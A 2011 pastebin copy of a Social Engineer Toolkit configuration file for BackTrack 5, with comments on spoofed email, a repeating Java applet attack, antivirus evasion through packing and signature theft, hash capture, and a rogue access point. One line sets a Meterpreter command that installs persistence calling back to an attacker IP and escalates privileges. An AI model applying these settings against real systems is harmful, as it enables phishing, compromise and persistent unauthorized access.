zegige

bt5_exploit_edit

Nov 15th, 2011
  1. ##################################################################################################
  2. ##################################################################################################
  3. ##            ##
  4. ## The following config file will allow you to customize settings within   ##
  5. ## the Social Engineer Toolkit. The lines that do not have comment code    ##
  6. ## ("#") are the fields you want to toy with. They are pretty easy to    ##
  7. ## understand.           ##
  8. ##            ##
  9. ## The Metasploit path is the default path for where Metasploit is located.   ##
  10. ## Metasploit is required for SET to function properly.      ##
  11. ##            ##
  12. ## The ETTERCAP function specifies if you want to use ARP Cache poisoning in   ##
  13. ## conjunction with the web attacks, note that ARP Cache poisoning is only   ##
  14. ## for internal subnets and does not work against people on the internet.   ##
  15. ##            ##
  16. ## The SENDMAIL option allows you to spoof source IP addresses utilizing an   ##
  17. ## application called SendMail. Sendmail is NOT installed by default on BackTrack5.  ##
  18. ## To spoof email addresses when performing the mass email attacks, you must    ##
  19. ## install Sendmail manually using: apt-get install sendmail     ##
  20. ##            ##
  21. ## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches.   ##
  22. ##            ##
  23. ## Note that the METASPLOIT_PATH cannot have a / after the folder name.    ##
  24. ##            ##
  25. ## There are additional options, read the comments for additional descriptions.          ##
  26. ##                   ##
  27. ##################################################################################################
  28. ##################################################################################################
  29. #
  30. # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
  31. METASPLOIT_PATH=/opt/framework3/msf3
  32. #
  33. # DEFINE WHETHER TO USE ETTERCAP WHEN USING THE WEBSITE ATTACK. ONLY SET TO ON OR OFF
  34. ETTERCAP=OFF
  35. #
  36. # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON. IF NOTHING IS SPECIFIED IT WILL DEFAULT
  37. # EXAMPLE: ETTERCAP_DSNIFF_INTERFACE=wlan0
  38. ETTERCAP_DSNIFF_INTERFACE=eth0
  39. #
  40. # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
  41. ETTERCAP_PATH=/usr/share/ettercap
  42. #
  43. # DEFINE WHETHER TO USE DSNIFF WHEN USING THE WEBSITE ATTACK. ONLY SET TO ON OR OFF
  44. # IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED.
  45. DSNIFF=OFF
  46. #
  47. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
  48. SENDMAIL=OFF
  49. #
  50. # SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
  51. WEBATTACK_EMAIL=OFF
  52. #
  53. # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
  54. # INSTALL --->  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
  55. # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
  56. SELF_SIGNED_APPLET=OFF
  57. #
  58. # THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFERENT.
  59. # THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
  60. JAVA_ID_PARAM=Secure Java Applet
  61. #
  62. # JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA APPLET IF
  63. # THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. THIS GIVES
  64. # A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
  65. JAVA_REPEATER=ON
  66. #
  67. # JAVA REPEATER TIMING WHICH IS THE DELAY IT TAKES BETWEEN THE USER HITTING CANCEL TO
  68. # WHEN THE NEXT JAVA APPLET RUNS. BE CAREFUL SETTING THIS TOO LOW AS IT WILL SPAWN THEM OVER
  69. # AND OVER EVEN IF THEY HIT RUN. 200 EQUALS 2 SECONDS.
  70. JAVA_TIME=200
  71. #
  72. # AUTO DETECTION OF THE IP ADDRESS INTERFACE UTILIZING GOOGLE. SET THIS TO ON IF YOU WANT
  73. # SET TO AUTODETECT YOUR INTERFACE
  74. AUTO_DETECT=OFF
  75. #
  76. # SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
  77. # OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
  78. WEB_PORT=80
  79. #
  80. # CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
  81. # DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
  82. # YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
  83. CUSTOM_EXE=legit.binary
  84. #
  85. # MAN LEFT IN THE MIDDLE PORT, THIS WILL BE USED FOR THE WEB SERVER BIND PORT
  86. MLITM_PORT=80
  87. #
  88. # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
  89. # THE ATTACK VECTOR
  90. APACHE_SERVER=OFF
  91. #
  92. # PATH TO THE APACHE WEBROOT
  93. APACHE_DIRECTORY=/var/www
  94. #
  95. # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
  96. WEBATTACK_SSL=OFF
  97. #
  98. # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
  99. # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
  100. # IF YOU'RE USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! TO TURN THIS ON TURN SELF_SIGNED_CERT
  101. # TO THE ON POSITION.
  102. #
  103. SELF_SIGNED_CERT=OFF
  104. #
  105. # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
  106. # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
  107. PEM_CLIENT=/root/newcert.pem
  108. PEM_SERVER=/root/newreq.pem
  109. #
  110. # TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
  111. # AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
  112. WEBJACKING_TIME=2000
  113. #
  114. # PORT FOR THE COMMAND CENTER
  115. COMMAND_CENTER_PORT=44444
  116. #
  117. # COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
  118. # SO YOU CAN REACH THE COMMAND CENTER REMOTELY, SET THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
  119. COMMAND_CENTER_INTERFACE=127.0.0.1
  120. #
  121. # HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS
  122. ENCOUNT=4
  123. #
  124. # WHAT DO YOU WANT TO USE FOR YOUR DEFAULT TERMINAL WITHIN THE COMMAND CENTER. THE DEFAULT IS XTERM
  125. # THE OPTIONS YOU HAVE ARE AS FOLLOW - GNOME, KONSOLE, XTERM, SOLO. IF YOU SELECT SOLO IT WILL PLACE
  126. # ALL RESULTS IN THE SAME SHELL YOU USED TO OPEN THE SET-WEB INTERFACE. THIS IS USEFUL IF YOU'RE USING
  127. # SOMETHING THAT ONLY HAS ONE CONSOLE, LET'S SAY AN IPHONE OR IPAD.
  128. TERMINAL=SOLO
  129. #
  130. # IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
  131. # NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
  132. # THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
  133. AUTO_MIGRATE=OFF
  134. #
  135. # DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
  136. # FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
  137. # THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
  138. DIGITAL_SIGNATURE_STEAL=ON
  139. #
  140. # THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
  141. # TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
  142. UPX_ENCODE=ON
  143. UPX_PATH=/usr/bin/upx
  144. #
  145. # HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
  146. # MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
  147. # PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
  148. # THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPARATE THE COMMANDS BY A ;
  149. METERPRETER_MULTI_SCRIPT=OFF
  150. #
  151. # WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
  152. # BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPARATE THEM WITH A ;. FOR EXAMPLE YOU COULD DO
  153. # run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
  154. METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
  155. #
  156. # THIS IS THE PORT THAT IS USED FOR THE IFRAME INJECTION USING THE METASPLOIT BROWSER ATTACKS
  157. # BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO
  158. # SOMETHING LIKE 21 OR 53
  159. METASPLOIT_IFRAME_PORT=8080
  160. #
  161. # THIS FEATURE WILL TURN ON OR OFF THE AUTOMATIC REDIRECTION. BY DEFAULT FOR EXAMPLE IN MULTI-ATTACK
  162. # THE SITE WILL REDIRECT ONCE ONE SUCCESSFUL ATTACK IS USED. SOME PEOPLE MAY WANT TO USE JAVA APPLET
  163. # AND CREDENTIAL HARVESTER FOR EXAMPLE.
  164. AUTO_REDIRECT=ON
  165. #
  166. # THIS FEATURE WILL AUTO EMBED AN IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
  167. # USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
  168. # IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
  169. # AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
  170. UNC_EMBED=OFF
  171. #
  172. # THIS FEATURE WILL ATTEMPT TO CREATE A ROGUE ACCESS POINT AND REDIRECT VICTIMS BACK TO THE
  173. # SET WEB SERVER WHEN ASSOCIATED. THIS USES AIRBASE-NG AND DNSSPOOF.
  174. ACCESS_POINT_SSID=linksys
  175. AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
  176. DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
  177. #
  178. # EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. SIMPLY CHANGE IT TO THE PROVIDER YOU WANT TO
  179. # USE.
  180. EMAIL_PROVIDER=GMAIL
  181. #
  182. # THIS WILL CONFIGURE THE DEFAULT CHANNEL THAT THE WIRELESS ACCESS POINT ATTACK BROADCASTS ON THROUGH WIFI
  183. # COMMUNICATIONS.
  184. AP_CHANNEL=9
  185. #
  186. # THIS WILL REMOVE THE SET INTERACTIVE SHELL FROM THE MENU SELECTION. THE SET PAYLOADS ARE LARGE IN NATURE
  187. # AND THINGS LIKE THE PWNIEXPRESS NEED SMALLER SET BUILDS
  188. SET_INTERACTIVE_SHELL=ON
  189. #
  190. #############################################################################################################